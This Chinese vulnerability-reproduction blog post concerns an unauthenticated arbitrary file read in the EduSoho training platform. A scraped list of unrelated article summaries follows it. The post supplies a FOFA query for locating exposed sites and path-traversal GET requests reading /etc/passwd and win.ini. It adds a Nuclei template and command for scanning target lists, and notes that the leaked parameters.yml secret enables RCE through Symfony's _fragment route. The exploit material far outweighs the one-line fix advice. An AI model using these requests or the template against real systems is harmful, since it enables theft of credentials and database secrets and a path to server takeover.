zkzq
zkzq

【漏洞复现】EduSoho教培系统 任意文件读取

该文章由掌控安全学院——1782814368投稿

【产品介绍】

EduSoho企培系统,基于EduSoho教育云PaaS平台的底层技术打造,专门为快速发展的企业提供一体化企业培训、企业内训组织解决方案,专注人才培养、专注组织建设,帮助企业构建学习型组织,促成终身学习、实现快速发展。

【漏洞介绍】

该教培系统classroom-course-statistics接口存在未授权任意文件读取漏洞,通过该漏洞攻击者可以读取到config/parameters.yml文件的内容,拿到该文件中保存的secret值以及数据库账号密码等敏感信息。拿到secret值后,攻击者可以结合symfony框架_fragment路由实现RCE

【资产测绘Query】

fofa语法:



    

  1. title="Powered By EduSoho" || body="Powered by EduSoho" || (body="Powered By EduSoho" && body="var app")
    2. 





【漏洞复现】EduSoho教培系统 任意文件读取_第1张图片


【产品界面】




【漏洞复现】EduSoho教培系统 任意文件读取_第2张图片


【漏洞复现】


【poc】


linux系统:




    

  1. GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1
    2. 

  2. Host: 127.0.0.1
    3. 





【漏洞复现】EduSoho教培系统 任意文件读取_第3张图片



 windows系统:




    

  1. GET /export/classroom-course-statistics?fileNames[]=../../../../../../../Windows/win.ini HTTP/1.1
    2. 

  2. Host: 127.0.0.1
    3. 





【漏洞复现】EduSoho教培系统 任意文件读取_第4张图片


【Nuclei-Poc】




    

  1. id: EduSoho_arbitrary_file_read_crossplatform
    2. 

  2. 

  3. info:
    4. 

  4. name: EduSoho Cross-Platform Directory Traversal Vulnerability
    5. 

  5. author: yourname
    6. 

  6. severity: critical
    7. 

  7. description:
    8. 

  8. tags: directory-traversal,cve,critical
    9. 

  9. 

  10. requests:
    11. 

  11. - method: GET
    12. 

  12. path:
    13. 

  13. - "{{BaseURL}}/export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd"
    14. 

  14. - "{{BaseURL}}/export/classroom-course-statistics?fileNames[]=../../../../../../../Windows/win.ini"
    15. 

  15. 

  16. matchers-condition: and
    17. 

  17. matchers:
    18. 

  18. - type: word
    19. 

  19. part: body
    20. 

  20. words:
    21. 

  21. - "root:x:0:0:root:/root:/bin/bash" # Unix-like systems
    22. 

  22. - "[extensions]" # Windows systems
    23. 

  23. condition: or
    24. 

  24. 

  25. - type: status
    26. 

  26. status:
    27. 

  27. - 200
    28. 

  28. 

  29. - type: word
    30. 

  30. part: body
    31. 

  31. negative: true
    32. 

  32. words:
    33. 

  33. - "empty file"
    34. 

  34. condition: and
    35. 

  35. 

  36. - type: word
    37. 

  37. part: body
    38. 

  38. negative: true
    39. 

  39. words:
    40. 

  40. - "\"success\": 0"
    41. 

  41. condition: and
    42. 



【验证】


.\nuclei -l 1.txt -t 4.yaml




【漏洞复现】EduSoho教培系统 任意文件读取_第5张图片


【修复建议】


1:更新到最新版本


申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。


免费领取安全学习资料包!


渗透工具




技术文档、书籍


 




面试题


帮助你在面试中脱颖而出




视频


基础到进阶


环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等


 




应急响应笔记




学习路线






































你可能感兴趣的:(漏洞,漏洞挖掘,信息泄露)






    

  • 日精进
石淑萍

    【早上好#淑萍#20230605日精进335】分享嘉宾:海明教练社群运营架构专家全域流量孵化教练个人品牌超千万利润打造高手基本的创业者,对于商业模式的设计都是有漏洞的。股权架构今天我们讲的商业模式主要是盈利模式。很多社群运营会做裂变,不会做转化,因为没有后端的设计。不断的去积累,思考有哪些模式,需要去如何设计。政策领域:政府补贴➕大学生技术/大学生创业团队盈利模型——赋能板块核心一:长期锁客—资格
    

    • 

  • 福建科立讯通信 指挥调度管理平台 SQL注入漏洞复现(CVE-2024-2620、CVE-2024-2621)
OidBoy_G
漏洞复现安全web安全

    0x01产品简介福建科立讯通信指挥调度管理平台是一个专门针对通信行业的管理平台。该产品旨在提供高效的指挥调度和管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务,并即时获取现场反馈和报告。0x02漏洞概述福建科立讯通信指挥调度管理平台down_fil
    

    • 

  • Linux系统及操作 (04)
3s不会飞
Linux基础常识linux运维服务器

    Linux系统及操作(03)RPM软件包网络下载对应软件包光盘镜像文件,具备软件包Windows系统软件包的管理可以指定安装位置安装是集中安装到一个目录Linux系统与Windows系统相反。常见的软件包(生态)类型电脑入侵99%都是通过软件包的漏洞进行的。window生态Android生态ios生态rpm软件包:扩展名为.rpm,适用于RedHat系统。deb软件包:扩展名为.deb适用于Deb
    

    • 

  • Nagios安装部署全攻略
weixin_34109408
memcachedphp操作系统

    概述:公司的生产机器一共有12台,2台LVS(主备)、2台nginx、2台tomcat、1台后台服务器(nginx_tomcat)、3台mysql(主+备+异地灾备)、1台图片服务器、2台memcached.可以看出网站的架构就是基于高可用的原理的,每个层面都做了主备、系统的PV不高,对于并发布,高性能没有那么苛求,对于系统安全、稳定有较高要求,前期已经对系统做了各种日志分析,WAF配置,漏洞扫面
    

    • 

  • 网页有效防止XSS,SQL注入,木马文件拦截上传等安全问题
程序员贵哥
网络安全xsssql安全网络安全web安全php

    网络安全问题一直是备受关注的话题,其中跨站脚本攻击(XSS)、SQL注入和木马文件上传是常见的安全威胁。下面我将详细介绍这些安全问题。首先是跨站脚本攻击(XSS)。XSS攻击是一种利用网站漏洞,将恶意脚本注入到用户浏览器中并执行的攻击方式。攻击者可以在网站中插入恶意脚本,当用户浏览该网站时,恶意脚本会被执行,从而窃取用户的敏感信息或执行其他恶意操作。XSS攻击可以分为反射型、存储型和DOM-bas
    

    • 

  • 字节-安全研究实习生(二面)
Pluto-2003
安全面试题安全网络笔记面试题安全研究

    `1、你作为护网蓝队中级工程师研判岗,你在护网中做了些什么在护网行动中,我主要做了以下工作:安全监测与分析监控网络流量和系统日志,使用IDS/IPS等工具检测潜在的安全威胁。分析安全事件,确定是否为真正的攻击,并对事件进行分类和优先级排序。漏洞管理定期扫描网络和系统,识别已知漏洞。协调相关部门及时修补漏洞,减少攻击面。安全防护策略制定根据组织的业务需求和安全状况,制定和更新安全防护策略。确保安全策
    

    • 

  • 字节-安全研究实习生--一面
Pluto-2003
安全面试题安全web安全网络面试笔记安全研究

    `1、你投的岗位是安全研究实习生,你了解我们这边主要是做什么的吗作为安全研究实习生,我理解贵公司主要专注于网络安全领域,致力于保护信息系统免受各种威胁和攻击。这可能包括但不限于以下几个方面:漏洞研究:识别和分析软件、硬件以及网络中的安全漏洞,以便及时修复,防止被恶意利用。威胁情报:收集和分析关于网络威胁的数据,包括恶意软件、攻击者行为模式、漏洞利用技术等,以便更好地理解和防御潜在的网络攻击。安全策
    

    • 

  • 【Golang星辰图】抵御恶意攻击:利用Go语言的安全库构建可靠的应用程序
friklogff
Golang星辰图golang安全开发语言

    加固你的代码:了解Go语言中的安全库和技术前言在当今数字化的世界中,保护代码和数据的安全性变得至关重要。恶意攻击、数据泄露和其他安全漏洞可能给我们的系统和用户带来巨大的风险和损失。为了增强软件的安全性和可靠性,我们需要利用现有的安全库来加固我们的应用程序和系统。本文将介绍一些常用的Go语言安全库,并提供详细的功能介绍和使用示例,帮助读者加强自己的代码和数据的安全性。欢迎订阅专栏:Golang星辰图
    

    • 

  • 由于 Positive Technologies 的专业知识,Moxa 消除了工业无线转换器中的一个漏洞。
ptsecurity
PositiveTechnologies网络安全漏洞开发语言人工智能web安全网络安全网络

    我们的专家在NPortW2150A和W2250A转换器中发现了该漏洞-这些设备可将工业控制器、仪表和传感器连接到本地Wi-Fi网络。Moxa已根据负责任的披露政策通知了该威胁,并发布了软件更新。攻击者可以完全访问这些设备。PositiveTechnologies公司网络应用安全分析小组的专家VladimirRazov说:"一个特殊请求就足以做到这一点。通过控制转换器,攻击者可以向连接的工业控制器和
    

    • 

  • WordPress Plugin NotificationX插件 SQL注入漏洞复现(CVE-2024-1698)
OidBoy_G
漏洞复现sqlweb安全安全

    0x01产品简介WordPress和WordPressplugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。0x02漏洞概述WordPresspluginNotificationX是一个应用插件。2.8.2版本及之前存在安全漏洞,该漏洞源于对用户提供的参数转义不充分以及对现有SQL查询缺乏充分
    

    • 

  • 第10讲_Spring对Dao的支持
吴国友

    Spring框架优秀就是在于MVC开发的时候一旦需要对底层的数据库操作,它可以很好的支持JDBC技术,还有现在主流的ORM框架(Hibernate,MyBatis)技术。重点先介绍Spring对JDBC支持。在Spring对JDBC支持中提供了一个模板JdbcTemplate,此模板封装了对JDBC操作的许多方法,且消除了忽视资源释放而引起的漏洞Spring对JDBC操作需要导入的jar(开发环境
    

    • 

  • 淘宝客赚钱秘籍:如何快速找到漏洞单并获取差价利润
高省浮沉000018

    随着网络购物的盛行,越来越多的人开始涉足淘宝客领域。而在淘宝客赚钱的过程中,找到漏洞单也就变得尤为重要了。本文将向大家介绍淘宝客如何快速找漏洞单,需要用到哪些软件,并且提供高省app赚钱的操作方法,让你赚钱不再难。大家好!我是高省APP最大团队&联合创始人浮沉导师!【高省】APP网购优惠券免费领,分享还能赚钱。【高省】是一个自用省钱佣金高,分享推广赚钱多的平台。佣金更高,模式更好,终端用户不流失。
    

    • 

  • 有关程序员的幽默,你懂多少?,有关程序员的礼品
Java程序员笔记

    先上一副对联:上联:一个项目两部电脑三餐盒饭只为四千工资搞得五脏俱损六神无主仍然七点起床八点开会处理九个漏洞十分辛苦;下联:十年编码九年加班八面无光忙的七窍生烟到头六亲不认五体投地依旧四肢酸软三更加班只为二个臭钱一生孤苦;横批:苦逼程序员。warmingorerror某假日,一名男程开车带朋友出去玩。突然前方出现路标:警告!前方危险!但是程序员司机一点减速的趋势都没有。朋友大呼:“你没看到前面有警
    

    • 

  • 服务器网络丢包的原因及解决方案
q2827116259
网络服务器

    ■网络丢包的原因及解决方案网络丢包是指当网络状况不佳时,数据包的传输无法100%完成,导致数据传输出现漏洞和丢包。让我们来讨论网络丢包的故障现象和解决方案。1、网络丢包的故障现象是打开网页的速度特别慢,有时网页的某些内容或整个页面无法显示;QQ等即时通讯工具频繁掉线或提示登录超时;已设置为自动获取IP地址,但不能每次正常获取;下载文件的速度很慢,其中很大一部分故障是由数据包丢失引起的。2、使用pi
    

    • 

  • 第九章、信息安全与多媒体基础5分
蒋劲豪
软考-中级-软件设计师软件工程

    信息系统安全属性保密性、完整性、可用性、可控性、可审查性网络安全威胁物理威胁、网络攻击、身份鉴别、编程威胁、系统漏洞对称加密DES、3DES、AES、RC-5、IDEA
    

    • 

  • python docker 镜像过大_【转】六种减小Docker镜像大小的方法
weixin_39627408
pythondocker镜像过大

    转自P牛,vulnhub作者,擅长代码审计和漏洞挖掘,今天看到他的公众号发了一篇这个,正好平时自己的工作也有需求,整理记录如下。=========================================我从2017年做Vulhub开始,一直在和一个麻烦的问题做斗争:在编写Dockerfile的时候,如何减小dockerbuild生成的镜像大小?这篇文章就给大家总结一下我自己使用过的六种减小
    

    • 

  • 政务云安全风险分析与解决思路探讨
德迅云安全--陈琦琦
网络安全web安全

    1.1概述为了掌握某市政务网站的网络安全整体情况,在相关监管机构授权后,我们组织人员抽取了某市78个政务网站进行安全扫描,通过安全扫描,对该市政务网站的整体安全情况进行预估。1.2工具扫描结果本次利用漏洞扫描服务VSS共扫描各类政务网站78个,其中存在漏洞的网站38个,占比为48.7%。其中存在高危漏洞的网站6个,占扫描网站总数的7.6%.从检测出漏洞的危险等级来看,高危漏洞数量占13%,中危占2
    

    • 

  • docker部署OpenVAS开源漏洞扫描系统——筑梦之路
筑梦之路
linux系统运维漏洞扫描系统

    OpenVAS是一个全功能的漏洞扫描器。它的功能包括非认证测试、认证测试、各种高水平和低水平的互联网和工业协议、大规模扫描的性能调整和一个强大的内部编程语言来实现任何类型的漏洞测试。用户需要一种自动测试的方法,并确保正在运行一种最恰当的最新测试。OpenVAS包括一个中央服务器和一个图形化的前端。这个服务器准许用户运行几种不同的网络漏洞测试(以Nessus攻击脚本语言编写),而且OpenVAS可以
    

    • 

  • 安全加速SCDN是服务器防御攻击较佳方案
德迅云安全-甲锵
网络安全网络安全web安全

    国家互联网应急中心的数据研究显示,基于漏洞、病毒、未知威胁的攻击正日益频繁且智能化,网络安全的防护难度也与日俱增,未来应用层攻击将成为主流。互联网飞速发展之余,对于网络安全的需求也越来越大,网络攻击的手段也越来越刁钻。CDN高防作为高防服务的代表就出现了,其实CDN高防的出现就是为了更好的服务网络安全,CDN高防其实现的手段就是通过高防DNS来实现。与传统的CDN相比,高防CDN优势可以归纳为:1
    

    • 

  • 黑客(网络安全)技术自学30天
一个迷人的黑客
web安全网络安全笔记深度学习网络安全信息安全

    有很多想要转行网络安全或者选择网络安全专业的人在进行决定之前一定会有的问题:什么样的人适合学习网络安全?我适不适合学习网络安全?当然,产生这样的疑惑并不奇怪,毕竟网络安全这个专业在2017年才调整为国家一级学科,而且大众对于网络安全的认知度不高,了解最多的可能就是个人信息泄露或者社区经常宣传的国家反诈APP。正是因为知之甚少,所以会产生这一系列的疑问。到底什么样的人适合学习网络安全呢?(需要什么前
    

    • 

  • 网络安全(黑客)——自学2024
小言同学喜欢挖漏洞
web安全安全学习网络安全深度学习网络信息安全

    有很多想要转行网络安全或者选择网络安全专业的人在进行决定之前一定会有的问题:什么样的人适合学习网络安全?我适不适合学习网络安全?当然,产生这样的疑惑并不奇怪,毕竟网络安全这个专业在2017年才调整为国家一级学科,而且大众对于网络安全的认知度不高,了解最多的可能就是个人信息泄露或者社区经常宣传的国家反诈APP。正是因为知之甚少,所以会产生这一系列的疑问。到底什么样的人适合学习网络安全呢?(需要什么前
    

    • 

  • OpenSSL 安全漏洞(CVE-2023-3817)
鹊鹊_Y
漏洞修复ssl服务器运维linux

    厂商补丁:目前厂商已发布升级补丁以修复漏洞,补丁获取链接:https://www.openssl.org/news/secadv/20230731.txtOpenSSL安全建议[2023年7月31日]==========================================检查DHq参数值花费过多时间(CVE-2023-3817)=============================
    

    • 

  • 入门【网络安全/黑客】启蒙教程
中国红客-巴克
web安全安全网络学习网络安全深度学习

    有很多想要转行网络安全或者选择网络安全专业的人在进行决定之前一定会有的问题:什么样的人适合学习网络安全?我适不适合学习网络安全?当然,产生这样的疑惑并不奇怪,毕竟网络安全这个专业在2017年才调整为国家一级学科,而且大众对于网络安全的认知度不高,了解最多的可能就是个人信息泄露或者社区经常宣传的国家反诈APP。正是因为知之甚少,所以会产生这一系列的疑问。到底什么样的人适合学习网络安全呢?(需要什么前
    

    • 

  • Spring Bean 生成流程详细解析
zy_zeros
springdubbojava

    很多人把spring的相关内容当作背八股文,认为只在面试时能用上,实际开发根本用不到。实际上早期的我也是这么想的,但随着开发年限的增长,解决了越来越多的难题后,不得不承认,这些基础知识的学习有着无法替代的作用。就拿我实际遇到的一个例子来说:有一个大型项目因为安全漏洞的原因要进行升级,需要从springboot1.0升级至springboot2.0,但发现springboot2的默认动态代理方式为C
    

    • 

  • 网络安全:kali之MSF工具基本使用方法
诺卡先生
网络安全学习笔记网络安全linux安全服务器linux

    1、进入MSF工具:nsfconsole2、查询漏洞利用工具:search漏洞编号3、打开工具:use工具id4、查看工具配置参数:showoptions5、查看工具的详细信息:info6、配置参数:set参数头目标主机set参数头目标端口(参数配置根据实际所缺参数为准)7、运行工具:run或者exploit@返回命令:back@新版kali已经自动配置Payload;不需要再次自己配置(当然也可
    

    • 

  • 对现有产品进行数据库版本的升级
草明
其他数据库安全

    何时升级数据库版本升级数据库版本是一个涉及到系统稳定性、性能、安全性和功能性的重要决策。以下是一些可能的情况和理由,可以考虑升级数据库版本:修复Bug和漏洞:新版本通常包含了对已知问题的修复和漏洞的修补程序,这些问题可能会影响到系统的稳定性和安全性。因此,当一个已知的严重漏洞被修复时,升级数据库版本是非常必要的。性能改进:新版本可能会带来性能方面的改进,例如优化查询执行计划、增加并发性能、减少资源
    

    • 

  • PHPInfo()信息泄漏原理以及修复方法
it技术分享just_free
安全安全网络网络安全渗透测试

    漏洞名称:PHPInfo信息泄漏、phpinfo()函数信息泄漏漏洞描述:phpinfo()函数返回的信息中包含了服务器的配置信息,包括:1)PHP编译选项以及文件扩展名的相关信息;2)php的版本信息3)php的配置信息;4)数据库信息;等敏感信息。这些敏感信息会帮助攻击者展开进一步的攻击。检测条件:1、被测网站web服务正常。2、采用PHP中间件架构的网站。检测方法:1、如果网站存在该漏洞,则
    

    • 

  • 2024年高级持续性威胁(APT)九大预测
廾匸0705
网络安全APT网络安全威胁态势

    预测一针对移动设备、可穿戴设备和智能设备的创新性漏洞利用程序兴起过去一年有一个重大发现,即"三角行动”(OperationTriangulation)。这是一项新的、非常隐蔽的间谍活动,攻击目标是iOS设备,我们同事的设备也遭到了攻击。在调查过程中,我们的团队在iOS中发现了五个漏洞,其中包括四个零日漏洞。这些漏洞不仅影响智能手机和平板电脑,还影响笔记本电脑、可穿戴设备和智能家居设备,包括Appl
    

    • 

  • 入门【网络安全/黑客】启蒙教程
中国红客-巴克
web安全安全网络安全网络php深度学习学习

    有很多想要转行网络安全或者选择网络安全专业的人在进行决定之前一定会有的问题:什么样的人适合学习网络安全?我适不适合学习网络安全?当然,产生这样的疑惑并不奇怪,毕竟网络安全这个专业在2017年才调整为国家一级学科,而且大众对于网络安全的认知度不高,了解最多的可能就是个人信息泄露或者社区经常宣传的国家反诈APP。正是因为知之甚少,所以会产生这一系列的疑问。到底什么样的人适合学习网络安全呢?(需要什么前
    

    • 

  • 语音系统智能AI机器人AI源码营销机器人电销机器人智能电话机器人拨号机器人语音机器人空号识别FreeSWITCH呼叫中心中间ipbxIPBX科大识别阿里识别语音识别语音翻译AI语音系统电销机器人系统搭
ai语音机器人
电销系统电销机器人语音系统机器人bootstraphtmldreamweaver人工智能

    2022新版本AI智能系统已修复远程执行漏洞1、增加话术体验模式,支持检测话术的完整性。2.支持开通运营商免费独立绑定公众号3、支持:空号,拒接,通话中,无法接通。。。结果识别4、意向客户推送ABC5.支持打断,支持重复回答6.终端账户支持单账户绑定多个微信7,支持单账户不通过VOS对接多台设备,支持多任务固定单独坐席拨打互不干扰。8。免费赠送话术,售后专门指导教学包教包会承诺一年售后服务!本系统
    

    • 

  • ViewController添加button按钮解析。(翻译)
张亚雄
c

    <div class="it610-blog-content-contain" style="font-size: 14px"></div>//  ViewController.m
//  Reservation software
//
//  Created by 张亚雄 on 15/6/2.

    

    • 

  • mongoDB 简单的增删改查
开窍的石头
mongodb

       在上一篇文章中我们已经讲了mongodb怎么安装和数据库/表的创建。在这里我们讲mongoDB的数据库操作
      在mongo中对于不存在的表当你用db.表名 他会自动统计
下边用到的user是表明,db代表的是数据库
      添加(insert):

    

    • 

  • log4j配置
0624chenhong
log4j

    1) 新建java项目
2) 导入jar包,项目右击,properties—java build path—libraries—Add External jar,加入log4j.jar包。
3) 新建一个类com.hand.Log4jTest
package com.hand;
import org.apache.log4j.Logger;
public class 
    

    • 

  • 多点触摸(图片缩放为例)
不懂事的小屁孩
多点触摸

    多点触摸的事件跟单点是大同小异的,上个图片缩放的代码,供大家参考一下
import android.app.Activity;
import android.os.Bundle;
import android.view.MotionEvent;
import android.view.View;
import android.view.View.OnTouchListener
    

    • 

  • 有关浏览器窗口宽度高度几个值的解析
换个号韩国红果果
JavaScripthtml

    1 元素的 offsetWidth 包括border padding  content  整体的宽度。
clientWidth  只包括内容区 padding 不包括border。
clientLeft =  offsetWidth -clientWidth  即这个元素border的值
offsetLeft  若无已定位的包裹元素
    

    • 

  • 数据库产品巡礼:IBM DB2概览
蓝儿唯美
db2

    IBM DB2是一个支持了NoSQL功能的关系数据库管理系统,其包含了对XML,图像存储和Java脚本对象表示(JSON)的支持。DB2可被各种类型的企 业使用,它提供了一个数据平台,同时支持事务和分析操作,通过提供持续的数据流来保持事务工作流和分析操作的高效性。 DB2支持的操作系统
DB2可应用于以下三个主要的平台:
 
工作站,DB2可在Linus、Unix、Windo
    

    • 

  • java笔记5
a-john
java

    控制执行流程:
1,true和false
   利用条件表达式的真或假来决定执行路径。例:(a==b)。它利用条件操作符“==”来判断a值是否等于b值,返回true或false。java不允许我们将一个数字作为布尔值使用,虽然这在C和C++里是允许的。如果想在布尔测试中使用一个非布尔值,那么首先必须用一个条件表达式将其转化成布尔值,例如if(a!=0)。
2,if-els
    

    • 

  • Web开发常用手册汇总
aijuans
PHP

    一门技术,如果没有好的参考手册指导,很难普及大众。这其实就是为什么很多技术,非常好,却得不到普遍运用的原因。
正如我们学习一门技术,过程大概是这个样子:
①我们日常工作中,遇到了问题,困难。寻找解决方案,即寻找新的技术;
②为什么要学习这门技术?这门技术是不是很好的解决了我们遇到的难题,困惑。这个问题,非常重要,我们不是为了学习技术而学习技术,而是为了更好的处理我们遇到的问题,才需要学习新的
    

    • 

  • 今天帮助人解决的一个sql问题
asialee
sql

                今天有个人问了一个问题,如下:
type     AD      value         
A  
    

    • 

  • 意图对象传递数据
百合不是茶
android意图IntentBundle对象数据的传递

    学习意图将数据传递给目标活动; 初学者需要好好研究的
  
   1,将下面的代码添加到main.xml中
  
<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http:/
    

    • 

  • oracle查询锁表解锁语句
bijian1013
oracleobjectsessionkill

    一.查询锁定的表
如下语句,都可以查询锁定的表
语句一:
select a.sid,
a.serial#,
p.spid,
c.object_name,
b.session_id,
b.oracle_username,
b.os_user_name
from v$process p, v$s
    

    • 

  • mac osx 10.10 下安装 mysql 5.6 二进制文件[tar.gz]
征客丶
mysqlosx

    场景:在 mac osx 10.10 下安装 mysql 5.6 的二进制文件。
环境:mac osx 10.10、mysql 5.6 的二进制文件
步骤:[所有目录请从根“/”目录开始取,以免层级弄错导致找不到目录]
1、下载 mysql 5.6 的二进制文件,下载目录下面称之为 mysql5.6SourceDir;
下载地址:http://dev.mysql.com/downl
    

    • 

  • 分布式系统与框架
bit1129
分布式

    RPC框架 Dubbo
什么是Dubbo
 
Dubbo是一个分布式服务框架,致力于提供高性能和透明化的RPC远程服务调用方案,以及SOA服务治理方案。其核心部分包含:    远程通讯: 提供对多种基于长连接的NIO框架抽象封装,包括多种线程模型,序列化,以及“请求-响应”模式的信息交换方式。    集群容错: 提供基于接
    

    • 

  • 那些令人蛋痛的专业术语
白糖_
springWebSSOIOC

    
spring
【控制反转(IOC)/依赖注入(DI)】:
由容器控制程序之间的关系,而非传统实现中,由程序代码直接操控。这也就是所谓“控制反转”的概念所在:控制权由应用代码中转到了外部容器,控制权的转移,是所谓反转。
简单的说:对象的创建又容器(比如spring容器)来执行,程序里不直接new对象。
Web
【单点登录(SSO)】:SSO的定义是在多个应用系统中,用户
    

    • 

  • 《给大忙人看的java8》摘抄
braveCS
java8

    函数式接口:只包含一个抽象方法的接口
lambda表达式:是一段可以传递的代码
 
 
 
你最好将一个lambda表达式想象成一个函数,而不是一个对象,并记住它可以被转换为一个函数式接口。
事实上,函数式接口的转换是你在Java中使用lambda表达式能做的唯一一件事。
 
方法引用:又是要传递给其他代码的操作已经有实现的方法了,这时可以使
    

    • 

  • 编程之美-计算字符串的相似度
bylijinnan
java算法编程之美

    
public class StringDistance {
/**
* 编程之美 计算字符串的相似度
* 我们定义一套操作方法来把两个不相同的字符串变得相同,具体的操作方法为:
* 1.修改一个字符(如把“a”替换为“b”);
* 2.增加一个字符(如把“abdd”变为“aebdd”);
* 3.删除一个字符(如把“travelling”变为“trav
    

    • 

  • 上传、下载压缩图片
chengxuyuancsdn
下载

    /**
*
* @param uploadImage --本地路径(tomacat路径)
* @param serverDir --服务器路径
* @param imageType --文件或图片类型
* 此方法可以上传文件或图片.txt,.jpg,.gif等
*/
public void upload(String uploadImage,Str
    

    • 

  • bellman-ford(贝尔曼-福特)算法
comsci
算法F#

    Bellman-Ford算法(根据发明者 Richard Bellman 和 Lester Ford 命名)是求解单源最短路径问题的一种算法。单源点的最短路径问题是指:给定一个加权有向图G和源点s,对于图G中的任意一点v,求从s到v的最短路径。有时候这种算法也被称为 Moore-Bellman-Ford 算法,因为 Edward F. Moore zu 也为这个算法的发展做出了贡献。
与迪科
    

    • 

  • oracle ASM中ASM_POWER_LIMIT参数
daizj
ASMoracleASM_POWER_LIMIT磁盘平衡

    ASM_POWER_LIMIT
该初始化参数用于指定ASM例程平衡磁盘所用的最大权值,其数值范围为0~11,默认值为1。该初始化参数是动态参数,可以使用ALTER  SESSION或ALTER  SYSTEM命令进行修改。示例如下:
SQL>ALTER  SESSION  SET   Asm_power_limit=2;

    

    • 

  • 高级排序:快速排序
dieslrae
快速排序

    
public void quickSort(int[] array){
this.quickSort(array, 0, array.length - 1);
}
public void quickSort(int[] array,int left,int right){
if(right - left <= 0
    

    • 

  • C语言学习六指针_何谓变量的地址 一个指针变量到底占几个字节
dcj3sjt126com
C语言

    # include <stdio.h>
int main(void)
{
/*
1、一个变量的地址只用第一个字节表示
2、虽然他只使用了第一个字节表示,但是他本身指针变量类型就可以确定出他指向的指针变量占几个字节了
3、他都只存了第一个字节地址,为什么只需要存一个字节的地址,却占了4个字节,虽然只有一个字节,
但是这些字节比较多,所以编号就比较大,

    

    • 

  • phpize使用方法
dcj3sjt126com
PHP

    phpize是用来扩展php扩展模块的,通过phpize可以建立php的外挂模块,下面介绍一个它的使用方法,需要的朋友可以参考下
安装(fastcgi模式)的时候,常常有这样一句命令:
代码如下:
/usr/local/webserver/php/bin/phpize
 
一、phpize是干嘛的?
phpize是什么?
phpize是用来扩展php扩展模块的,通过phpi
    

    • 

  • Java虚拟机学习 - 对象引用强度
shuizhaosi888
JAVA虚拟机

    
本文原文链接:http://blog.csdn.net/java2000_wl/article/details/8090276 转载请注明出处!
无论是通过计数算法判断对象的引用数量,还是通过根搜索算法判断对象引用链是否可达,判定对象是否存活都与“引用”相关。
引用主要分为 :强引用(Strong Reference)、软引用(Soft Reference)、弱引用(Wea
    

    • 

  • .NET Framework 3.5 Service Pack 1(完整软件包)下载地址
happyqing
.net下载framework

     
Microsoft .NET Framework 3.5 Service Pack 1(完整软件包) 
http://www.microsoft.com/zh-cn/download/details.aspx?id=25150
Microsoft .NET Framework 3.5 Service Pack 1 是一个累积更新,包含很多基于 .NET Framewo
    

    • 

  • JAVA定时器的使用
jingjing0907
javatimer线程定时器

    1、在应用开发中,经常需要一些周期性的操作,比如每5分钟执行某一操作等。
对于这样的操作最方便、高效的实现方式就是使用java.util.Timer工具类。
privatejava.util.Timer timer;
timer = newTimer(true);
timer.schedule(
newjava.util.TimerTask() { public void run()

    

    • 

  • Webbench
流浪鱼
webbench

    首页下载地址 http://home.tiscali.cz/~cz210552/webbench.html
Webbench是知名的网站压力测试工具,它是由Lionbridge公司(http://www.lionbridge.com)开发。
Webbench能测试处在相同硬件上,不同服务的性能以及不同硬件上同一个服务的运行状况。webbench的标准测试可以向我们展示服务器的两项内容:每秒钟相
    

    • 

  • 第11章 动画效果(中)
onestopweb
动画

    index.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
    

    • 

  • windows下制作bat启动脚本.
sanyecao2314
javacmd脚本bat

    java -classpath C:\dwjj\commons-dbcp.jar;C:\dwjj\commons-pool.jar;C:\dwjj\log4j-1.2.16.jar;C:\dwjj\poi-3.9-20121203.jar;C:\dwjj\sqljdbc4.jar;C:\dwjj\voucherimp.jar com.citsamex.core.startup.MainStart 
    

    • 

  • Java进行RSA加解密的例子
tomcat_oracle
java

    加密是保证数据安全的手段之一。加密是将纯文本数据转换为难以理解的密文;解密是将密文转换回纯文本。   数据的加解密属于密码学的范畴。通常,加密和解密都需要使用一些秘密信息,这些秘密信息叫做密钥,将纯文本转为密文或者转回的时候都要用到这些密钥。   对称加密指的是发送者和接收者共用同一个密钥的加解密方法。   非对称加密(又称公钥加密)指的是需要一个私有密钥一个公开密钥,两个不同的密钥的
    

    • 

  • Android_ViewStub
阿尔萨斯
ViewStub

    public final class ViewStub extends View
java.lang.Object
android.view.View
android.view.ViewStub
类摘要: ViewStub 是一个隐藏的,不占用内存空间的视图对象,它可以在运行时延迟加载布局资源文件。当 ViewSt
    

    • 














按字母分类:
ABCDEFGHIJKLMNOPQRSTUVWXYZ其他